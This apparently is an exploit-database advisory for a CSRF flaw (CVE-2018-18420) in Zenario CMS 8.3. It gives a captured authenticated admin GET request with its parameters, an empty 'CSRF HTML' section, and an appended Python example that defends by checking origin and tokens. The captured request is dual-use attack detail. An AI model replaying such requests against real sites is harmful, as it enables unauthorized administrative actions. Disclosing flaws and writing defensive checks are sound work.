# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery (CSRF)
# Date: 2018-05-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997
# Software: Zenar Content Management System 8.3
# Version: 8.3
# Vulnerability Type: Web Application
# Vulnerability: Cross-Site Request Forgery (CSRF)
# CVE: CVE-2018-18420

# A Cross-Site Request Forgery (CSRF) vulnerability was discovered in
# version 8.3 of Zenar Content Management System via the
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.

# POC:

# GET Request:

Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest

# Query String Parameters:

path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0

# CSRF HTML:

Zenar Content Management System - Cross-Site Request Forgery ( CSRF )

# You want to follow my activity?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
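
The request captured above is authenticated only by the session cookie, which a browser can attach to cross-site requests as well. The following is an added example, not code from Zenario or from the exploit author: a server-side check that processes a request to the admin AJAX endpoint only when it is same-origin and carries a per-session token. The `X-CSRF-Token` header name, the token value and the function names are assumptions made for the illustration.

```python
import hmac
from urllib.parse import urlsplit

ADMIN_PATH = "/zenario/admin/organizer.ajax.php"  # path from the captured request
TOKEN_HEADER = "x-csrf-token"                     # hypothetical header name

def parse_headers(raw):
    """Turn 'Name: value' lines into a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.strip().splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def origin_of(url):
    """Return (scheme, host, port) for an absolute http(s) URL, else None."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:  # malformed URL or port
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return (parts.scheme, parts.hostname.lower(), port or (443 if parts.scheme == "https" else 80))

def check_admin_request(path, headers, site_origin, session_token):
    """Return (allowed, reason) for a request that arrived with a valid session cookie."""
    if not path.startswith(ADMIN_PATH):
        return True, "not the admin AJAX endpoint"
    source = headers.get("origin") or headers.get("referer")
    if not source or origin_of(source) != origin_of(site_origin):
        return False, "cross-site or missing Origin/Referer"
    sent = headers.get(TOKEN_HEADER, "")
    if not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "anti-CSRF token missing or wrong"
    return True, "same-origin request with valid token"

# Headers taken from the request captured above (cookie omitted; it is sent either way).
CAPTURED = """
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
X-Requested-With: XMLHttpRequest
"""
SITE = "http://demo.zenar.io"
TOKEN = "constructed-per-session-token"  # constructed sample value

if __name__ == "__main__":
    h = parse_headers(CAPTURED)
    print(check_admin_request(ADMIN_PATH, h, SITE, TOKEN))
    print(check_admin_request(ADMIN_PATH, {**h, TOKEN_HEADER: TOKEN}, SITE, TOKEN))
    print(check_admin_request(ADMIN_PATH, {**h, "referer": "http://other.example/p.html"}, SITE, TOKEN))
```

The captured request passes the origin check but is refused for lack of a token, which is the gap the advisory describes: nothing in it besides the cookie ties the request to the admin's own session.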